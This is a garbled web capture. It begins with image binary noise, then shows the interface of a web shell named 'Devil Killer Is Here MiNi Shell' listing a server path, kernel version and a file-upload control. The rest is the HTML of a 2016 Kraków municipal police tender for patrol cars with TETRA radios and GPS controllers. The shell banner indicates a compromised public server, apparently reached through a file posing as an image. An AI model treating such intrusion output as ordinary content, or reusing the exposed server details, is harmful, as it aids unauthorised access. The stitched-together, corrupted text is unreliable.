JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160906/305676-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 305676 - 2016
              z dnia 2016-09-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa III<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Straż Miejska Miasta Krakowa, krajowy numer identyfikacyjny
              35000739900000, ul.
              ul. Dobrego Pasterza 
              116,
              31416  
              Kraków, woj.
              małopolskie, państwo
              , tel.
              12 68 82 154, e-mail
              zamowienia@strazmiejska.krakow.pl, faks
              12 68 82 292.
              <br />
              Adres strony internetowej (URL): www.bip.krakow.pl/ST<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.krakow.pl/ST</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Straż Miejska Miasta Krakowa, ul. Dobrego Pasterza 116, 31-416 Kraków</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa III<br /><b>Numer referencyjny: </b>ST.GT.271-17/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ I
Przedmiotem zamówienia jest dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa, fabrycznie nowych, nieużywanych, wyprodukowanych w 2015 lub 2016 r.  2 szt.
Oznaczenie przedmiotu zamówienia wg CPV 34.11.00.00-1
Samochód osobowy typu kombivan w wersji osobowej  2 szt.
CZĘŚĆ II
Przedmiotem zamówienia jest dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa, w ilości 2 sztuk, fabrycznie nowych, nieużywanych, wyprodukowanych w 2016 lub 2015 roku. 
Samochód osobowy, fabrycznie nowy (rok produkcji 2016 lub 2015) - 2 szt. 
CZĘŚĆ III
Przedmiotem zamówienia jest dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa, w ilości 4 sztuk, fabrycznie nowych, nieużywanych, wyprodukowanych w 2016 lub 2015 roku.
Samochód osobowy, fabrycznie nowy, nieużywany (rok produkcji 2016 lub 2015) - 4 szt. 
A. Każdy samochód w każdej części zamówienia tj. I, II i III musi być wyposażony 
w środki łączności (radiostacje) wg poniższej specyfikacji:

1.	Radiotelefon bazowy standardu TETRA typ MTM5200 lub równoważny
 spełniający poniższe wymagania:
1)	 ukompletowaniu zestawu:
a)  radiotelefon samochodowy - standard TETRA, w najnowszej dostępnej 
                           na rynku wersji firmware,
b)  opcjonalnie uchwyt montażowy,
b)	przewody zasilające,
c)	głośnik o mocy minimum 13 W,
d)	mikrofon wraz z zaczepem,
e)	dokumentacja użytkownika radiotelefonu w języku polskim,
f)	deklaracja zgodności,
g)	karta gwarancyjna.
2)	Parametry radiotelefonu:
a)	zakres częstotliwości pracy 380 -  430 MHz,
b)	moc nadajnika min. 3 W, 
c)	czułość statyczna odbiornika  min -114 dBm,
d)	czułość dynamiczna odbiornika min -105 dBm,
e)	praca w trybie TMO obejmującej: 
	wywołania grupowe,
	wywołania indywidualne i alarmowe - w trybie półdupleksowym 
i dupleksowym,
	 możliwość pracy w trybie bezpośrednim  DMO,
f)	wieloszczelinowa usługa transmisji danych pakietowych (aktywacja
        w terminie późniejszym),
g)	wysyłanie krótkich wiadomości SDS i tekstowych alfanumerycznych, 
h)	możliwość wysyłania i odbierania wiadomości statusowych,
i)	wyświetlacz kolorowy, o ilości kolorów nie mniejszej niż 65 000, 
        przekątnej min 2.8", rozdzielczości min 640 x 480 pikseli, podświetlany 
        o szerokim kącie widzenia - różne opcje podświetlenia do wyboru, 
        zapewniający czytelność obrazu w różnych warunkach oświetleniowych,
j)	praca na dowolnej, z co najmniej 100 zaprogramowanych grup 
        rozmównych TMO,
k)	wybór grup rozmównych  dedykowanym przełącznikiem obrotowym
        lub dedykowanymi do tego celu przyciskami,
l)	regulacja głośności przełącznikiem obrotowym,
m)	interfejs użytkownika radiotelefonu w języku polskim (nie są wymagane 
        polskie znaki diakrytyczne),
n)	dedykowany przycisk wywołania alarmowego do aktualnie używanej
         grupy lub do predefiniowanej grupy,
o)	przerwanie (anulowanie) trybu alarmowego z poziomu radiotelefonu 
        przez wywołującego,
p)	możliwości programowego zdefiniowania skróconych numerów 
        wybierania ISSI,
q)	identyfikacja rozmówcy, 
r)	możliwości programowego i ręcznego zdefiniowania ustawień fonii 
        dopasowanych do środowiska odsłuchowego w ramach przynajmniej 
        3 różnych profili,
s)	możliwości programowego oraz ręcznego zdefiniowania listy kontaktów 
        radiowych i telefonicznych, o pojemności przynajmniej 100 pozycji,
t)	radiotelefon z pełną klawiaturę alfanumeryczną,
u)	możliwość zdalnego blokowania radiotelefonu,
v)	kontrola dostępu użytkownika Kody PIN/PUK,
w)	interfejs do urządzeń peryferyjnych umożliwiający współpracę 
        z zewnętrznymi urządzeniami np. komputerem,
x)	klasa ochrony, nie mniej niż IP 54.
Zamawiający wymaga, aby dostarczony radiotelefon był w pełni kompatybilny 
z używanym przez niego systemem łączności radiowej w standardzie TETRA DIMETRA producenta Rohill.
Dostarczone radiotelefony w wersji oprogramowania (firmware), które umożliwi 
konfigurowanie radiotelefonów TETRA z oprogramowaniem CPS plus (R.07.10.09.01), 
posiadanym przez Zamawiającego. Jeżeli dostarczone radiotelefony będą posiadać wyższą wersję oprogramowania (firmware), Wykonawca dostarczy jeden komplet 
specjalistycznego oprogramowania do konfigurowania radiotelefonów systemu TETRA objętych niniejszym zamówieniem, w aktualnych stabilnych wersjach wraz dokumentacją 
i okablowaniem. W sytuacji, gdy do instalacji będzie niezbędne dodatkowe 
oprogramowanie, specyficzne dla zakupionego sprzętu, Wykonawca dostarczy 
je na nośnikach oddzielnie dla każdego zakupionego urządzenia (w przypadku dostawy różnych modeli radiotelefonów) lub na jednym nośniku (w przypadku dostawy tego 
samego modelu radiotelefonu). Dla każdego wymaganego oprogramowania Wykonawca przekaże pełną, niewyłączną licencję na jego nieograniczone czasowo użytkowanie.
2. Sterownik pojazdowy.
     Sterownik spełniający minimalne parametry:
	pamięć typu flash,
	układ ładowania akumulatora,
	zdalna konfiguracja czasu, po którym nastąpi wyłączenie sterownika w minimalnym zakresie od 1sek. do 4 dni,
	zdalna konfiguracja ilości rekordów wysłanych do serwera,
	możliwość samoczynnego uruchomienia, po przekręceniu stacyjki,
	zakres działania od 9 do 35 V napięcia stałego,
	temperatura pracy urządzenia od -40 do +70 st. C,
	cztery porty analogowe konfigurowalne jako:
	wejścia analogowe napięciowe (zakres 0-40V) lub prądowe (o-100 mA),
a)	cztery porty cyfrowe, konfigurowalne jako:
	wejścia cyfrowe (napięcie w zakresie 0-40V),
	wyjścia cyfrowe (napięcie 0/3,3 V).
b)	trzy porty wyjściowe wysokoprądowe:
	obciążalność 0,5A,
	zabezpieczenie przed zwarciem i przeciążeniem,
	napięcie wyjściowe  takie jak w sterowniku,
c)	wbudowane:
	odbiornik GPS,
	modem GSM,
d)możliwość pracy w różnych systemach łączności:
	GSM,
	łączność konwencjonalna VHF i UHF analogowa i cyfrowa,
	trankingowa MPT1327 i TETRA,
e)	wejście i wyjście RS232 TTL,
d)	złącza antenowe wyprowadzone na zewnątrz obudowy.
Oferowany sterownik musi być w pełni kompatybilny z obecnie użytkowanym przez 
Zamawiającego systemem i oprogramowaniem.
Zamawiający informuje, iż obecnie użytkowane są sterowniki pojazdowe GPSmikro firmy AKSEL z Rybnika oraz oprogramowanie do wizualizacji pozycji GPS ConSEL ver. 3.4.3.938, również tego samego producenta.
3. Antena GPS-TETRA
Antena samochodowa zintegrowana GPS + Tetra (380-430 Mhz). Obecnie Zamawiający wykorzystuje anteny GPSK firmy Panorama Antennas.
Zamawiający wymaga dostarczenia rozwiązania tożsamego lub równoważnego.
Dodatkowe wymagania
a)	sterownik zamontowany w miejscu niewidocznym i niedostępnym dla użytkowników pojazdu, miejsce jego montażu Wykonawca wskaże przy odbiorze technicznym 
pojazdu,
b)	radiotelefon zamontowany w taki sposób, aby Zamawiający mógł z łatwością 
go zaprogramować poprzez:
	 podłączenie przewodu do właściwego gniazda w radiotelefonie i zaprogramowanie
  bez konieczności jego demontażu,
lub 
	 zdemontowanie radiotelefonu i jego zaprogramowanie na odrębnym stanowisku.

UWAGA: miejsce montażu urządzeń łączności musi być uzgodnione z Zamawiającym 
i nie może w jakikolwiek sposób ograniczyć praw do gwarancji udzielanej przez producenta pojazdu.
Dostawa urządzeń łączności wraz z pełną instalacją i uruchomieniem.
Zamawiający wymaga dostarczenia rozwiązania tożsamego lub równoważnego.
Pojazdy muszą spełniać wymagania techniczne określone w rozporządzeniu Ministra 
Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów 
oraz zakresu ich niezbędnego wyposażenia (tekst jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.), a ewentualne zmiany adaptacyjne (przystosowanie pojazdów) nie mogą powodować utraty świadectwa zgodności (homologacji), ani powodować ograniczenia uprawnień 
wynikających z fabrycznej gwarancji samochodu bazowego.

B. Każdy samochód przed dostarczeniem musi być:
a)	zarejestrowany z zastrzeżeniem § 4 ust. 4  wzoru umowy (załącznik nr 8), 
na podstawie oddzielnego, pisemnego upoważnienia wystawionego przez 
Zamawiającego;
b)	oznakowany, zgodnie z opisem dla każdej z części, spełniającym następujące 
wymagania: 
- pas granatowy - folia wylewana o grubości 85 (mikrometrów) z klejem akrylowym
   kanalikowym typu Bubble Free, o kolorze granatowym nieodbiegającym od koloru 
   TF 739-23 BF Scandinavian Blue - Sublime Mactac 
 pas szachownica, numer boczny oraz numer telefonu  wykonane z folii 
    w kolorze żółtym, odblaskowym, Mactac seria 5700 lub Reflektor,
- logo SMMK - druk zalaminowany
c)	wyposażony w instalację sygnalizacyjno  ostrzegawczą świetlną, zgodnie 
z opisem dla każdej z części;
d)	wyposażony w dodatkowy komplet kół  4 szt., tj. zestaw składający się z opon zimowych zamontowanych na felgach stalowych;
e)	ubezpieczony od pełnej wartości pojazdu i w pełnym zakresie tj. OC, AC i NNW 
(odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych, następstw nieszczęśliwych 
wypadków kierowcy i pasażerów obejmujące wszystkie miejsca w pojeździe z suma ubezpieczenia minimum 10.000,00 zł na jedna osobę, auto casco w wariancie pełnym, ze zniesionym udziałem 
własnym, bez stosowania amortyzacji części, bez redukcji sumy ubezpieczenia w przypadku wypłaty 
w trakcie okresu ubezpieczenia szkód częściowych na 1 rok kalendarzowy, suma ubezpieczenia musi odpowiadać wartości pojazdu brutto uwzględniającej koszty zamontowanych środków łączności, instalacji świetlno-dźwiękowej wraz z belką, dodatkowego wyposażenia w koła zimowe, kosztów oznakowania pojazdu oraz kosztów dokonania rejestracji, polisa ma być wystawiona na Straż Miejska Miasta Krakowa.
Wszystkie wymienione składniki wyposażenia mają zostać uwzględnione w cenie 
samochodów. Za pełną wartość pojazdu wykazaną na fakturze za pojazd, należy przyjąć: cenę samochodu plus dodatkowe (wliczone) koszty tj.: oznakowanie, instalacja 
sygnalizacyjno  ostrzegawcza świetlna, ubezpieczenie w pełnym zakresie, komplet kół 
zimowych i ostateczne zarejestrowanie pojazdu.
   Zamawiający wymaga, aby:
      - odbiór pojazdów nastąpił w Krakowie, w siedzibie Straży Miejskiej Miasta Krakowa 
         przy ul. Dobrego Pasterza 116;
 -  Wykonawca zapewnił obsługę serwisową oraz naprawy gwarancyjne na terenie miasta
 Krakowa, ze wskazaniem konkretnej stacji serwisowej;
     - minimalny okres gwarancji udzielonej przez Wykonawcę wynosić będzie:
          mechaniczna minimum 24 miesiące - bez limitów kilometrów lub 
          z limitem kilometrów nie mniejszym niż 100 tysięcy kilometrów, na powłokę 
          lakierniczą minimum 24 miesiące, na perforację minimum 72 miesiące.                                       
Okres gwarancji dla każdego pojazdu biegnie osobno i rozpoczyna bieg każdorazowo 
z chwilą podpisania protokołu odbioru.                                                  
Opis z danymi technicznymi oferowanych samochodów należy dołączyć do formularza oferty.
Zamawiający dopuszcza składanie ofert częściowych.
Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej.
Zamawiający przewiduje możliwość zastosowania prawa opcji tj: zamówienie może być:
a)	zwiększone w części I o 1 lub o 2 lub o 3 samochody wraz z wyposażeniem,
                       lub
b)   zwiększone w części II o 1 lub o 2 lub o 3 samochody wraz z wyposażeniem,
                        lub
c)  zwiększone w części I o 1 lub o 2 lub o 3 samochody wraz z wyposażeniem i zwiększone w części II o 1 lub 2 lub o 3 samochody wraz z wyposażeniem, w ramach tego samego zamówienia. W takim przypadku będą miały zastosowanie ceny jednostkowe samochodów wskazane w ofercie wybranego Wykonawcy.
<br /><br /><b>II.5) Główny kod CPV: </b>34110000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Ocena spełnienia 
ww. warunku nastąpi metodą spełnia/nie spełnia na podstawie załączonego 
do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 2 
do SIWZ.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy, potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy Pzp, zgodnie 
z załącznikiem nr 2 do SIWZ.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, że wykonał, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonuje lub wykonał:
- dla części I  co najmniej jedną dostawę, co najmniej jednego samochodu, 
o podobnym (zbliżonym) charakterze typu kombivan lub kombi,
- dla części II  co najmniej jedną dostawę, co najmniej jednego samochodu, 
o podobnym (zbliżonym) charakterze typu SUV, mini SUV, crossover,
- dla części III  co najmniej jedną dostawę, co najmniej jednego samochodu 
z napędem na 2 osie (4x4),
przy czym przy składaniu oferty na więcej niż jedną część, wykonuje lub wykonał, 
co najmniej jedną dostawę, co najmniej jednego samochodu, o podobnym (zbliżonym) charakterze dla danej części na którą Wykonawca składa ofertę, zgodnie z opisem powyżej.
Dostawy te mogły być zrealizowane dla podmiotów typu: Straż Miejska/Gminna, 
Policja, Żandarmeria Wojskowa, Straż Pożarna, Służba Więzienna, Straż Graniczna, Wojsko Polskie, Straż Leśna itp. lub do jednostek organizacyjnych 
o charakterze publicznym, świadczącym usługi powszechne dla ludności 
m. in.: Miejskie Przedsiębiorstwo Komunikacyjne, Pogotowie Ratunkowe, Spółki Gazowe, Spółki Energetyczne, Poczta Polska, Zakłady Infrastruktury Komunalnej i Transportu, Miejskie Przedsiębiorstwo Oczyszczania itp.
Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty:
-  oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 4 do SIWZ,  
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	oświadczenie o braku podstaw do wykluczenia, zgodnie z załącznikiem nr 5 do SIWZ, 
